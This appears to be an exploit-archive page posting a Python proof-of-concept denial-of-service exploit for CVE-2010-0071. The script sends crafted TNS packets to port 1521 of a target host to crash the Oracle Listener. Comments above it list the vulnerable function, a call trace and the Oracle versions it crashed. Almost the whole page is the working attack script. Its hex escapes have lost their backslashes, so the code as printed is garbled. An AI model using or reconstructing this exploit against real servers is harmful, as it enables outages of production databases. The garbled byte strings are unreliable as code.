CVE-2010-0071.py.txt

Posted on 22 January 2010

# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash # While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt # to allocate huge memory block and copy *something* to it. # TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95)) # TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020 # TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab)) # (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched) # If I correct, nsglvcrt() function is involved in new service creation. # Successfully crashed: # Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied # Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied # Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied # Oracle RDBMS 10.2.0.2 Linux x86 # Not crashed: # Oracle RDBMS 11.2 Linux x86 # Vulnerability discovered by Dennis Yurichev <dennis@conus.info> # Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0): # http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html from sys import * from socket import * sockobj = socket(AF_INET, SOCK_STREAM) sockobj.connect ((argv[1], 1521)) sockobj.send( "x00x68x00x00x01x00x00x00" "x01x3Ax01x2Cx00x00x20x00" "x7FxFFxC6x0Ex00x00x01x00" "x00x2Ex00x3Ax00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x00x28x43x4Fx4Ex4Ex45" "x43x54x5Fx44x41x54x41x3D" "x28x43x4Fx4Dx4Dx41x4Ex44" "x3Dx73x65x72x76x69x63x65" "x5Fx72x65x67x69x73x74x65" "x72x5Fx4Ex53x47x52x29x29" ) data=sockobj.recv(102400) sockobj.send( "x02xDEx00x00x06x00x00x00" "x00x00x00x00x02xD4x20x08" "xFFx03x01x00x12x34x34x34" "x34x34x78x10x10x32x10x32" "x10x32x10x32x10x32x54x76" "x00x78x10x32x54x76x44x00" "x00x80x02x00x00x00x00x04" "x00x00x70xE4xA5x09x90x00" "x23x00x00x00x42x45x43x37" "x36x43x32x43x43x31x33x36" "x2Dx35x46x39x46x2Dx45x30" "x33x34x2Dx30x30x30x33x42" "x41x31x33x37x34x42x33x03" "x00x65x00x01x00x01x00x00" "x00x00x00x00x00x00x64x02" "x00x80x05x00x00x00x00x04" "x00x00x00x00x00x00x01x00" "x00x00x10x00x00x00x02x00" "x00x00x84xC3xCCx07x01x00" "x00x00x84x2FxA6x09x00x00" "x00x00x44xA5xA2x09x25x98" "x18xE9x28x50x4Fx28xBBxAC" "x15x56x8Ex68x1Dx6Dx05x00" "x00x00xFCxA9x36x22x0Fx00" "x00x00x60x30xA6x09x0Ax00" "x00x00x64x00x00x00x00x00" "x00x00xAAx00x00x00x00x01" "x00x00x17x00x00x00x78xC3" "xCCx07x6Fx72x63x6Cx00x28" "x48x4Fx53x54x3Dx77x69x6E" "x32x30x30x33x29x00x01x00" "x00x00x58x00x00x00x01x00" "x00x00x50xC5x2Fx22x02x00" "x00x00x34xC5x2Fx22x00x00" "x00x00x9CxC5xCCx07x6Fx72" "x63x6Cx5Fx58x50x54x00x09" "x00x00x00x50xC5x2Fx22x04" "x00x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x34" "xC5xCCx07x6Fx72x63x6Cx5F" "x58x50x54x00x01x00x00x00" "x05x00x00x00x01x00x00x00" "x84xC5x2Fx22x02x00x00x00" "x68xC5x2Fx22x00x00x00x00" "xA4xA5xA2x09x6Fx72x63x6C" "x00x05x00x00x00x84xC5x2F" "x22x04x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00xFCxC4xCCx07x6Fx72x63" "x6Cx00x01x00x00x00x10x00" "x00x00x02x00x00x00xBCxC3" "xCCx07x04x00x00x00xB0x2F" "xA6x09x00x00x00x00x00x00" "x00x00x89xC0xB1xC3x08x1D" "x46x6DxB6xCFxD1xDDx2CxA7" "x66x6Dx0Ax00x00x00x78x2B" "xBCx04x7Fx00x00x00x64xA7" "xA2x09x0Dx00x00x00x20x2C" "xBCx04x11x00x00x00x95x00" "x00x00x02x20x00x80x03x00" "x00x00x98xC5x2Fx22x00x00" "x00x00x00x00x00x00x0Ax00" "x00x00xB0xC3xCCx07x44x45" "x44x49x43x41x54x45x44x00" "x28x41x44x44x52x45x53x53" "x3Dx28x50x52x4Fx54x4Fx43" "x4Fx4Cx3Dx42x45x51x29x28" "x50x52x4Fx47x52x41x4Dx3D" "x43x3Ax5Cx61x70x70x5Cx41" "x64x6Dx69x6Ex69x73x74x72" "x61x74x6Fx72x5Cx70x72x6F" "x64x75x63x74x5Cx31x31x2E" "x31x2Ex30x5Cx64x62x5Fx31" "x5Cx62x69x6Ex5Cx6Fx72x61" "x63x6Cx65x2Ex65x78x65x29" "x28x41x52x47x56x30x3Dx6F" "x72x61x63x6Cx65x6Fx72x63" "x6Cx29x28x41x52x47x53x3D" "x27x28x4Cx4Fx43x41x4Cx3D" "x4Ex4Fx29x27x29x29x00x4C" "x4Fx43x41x4Cx20x53x45x52" "x56x45x52x00x68xC5x2Fx22" "x34xC5x2Fx22x00x00x00x00" "x05x00x00x00x84xC5x2Fx22" "x04x00x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "xFCxC4xCCx07x6Fx72x63x6C" "x00x09x00x00x00x50xC5x2F" "x22x04x00x00x00x00x00x00" "x00x00x00x00x00x00x00x00" "x00x34xC5xCCx07x6Fx72x63" "x6Cx5Fx58x50x54x00" ) sockobj.close()

TOP

Malware :

Last 20

Exploits :

Last 20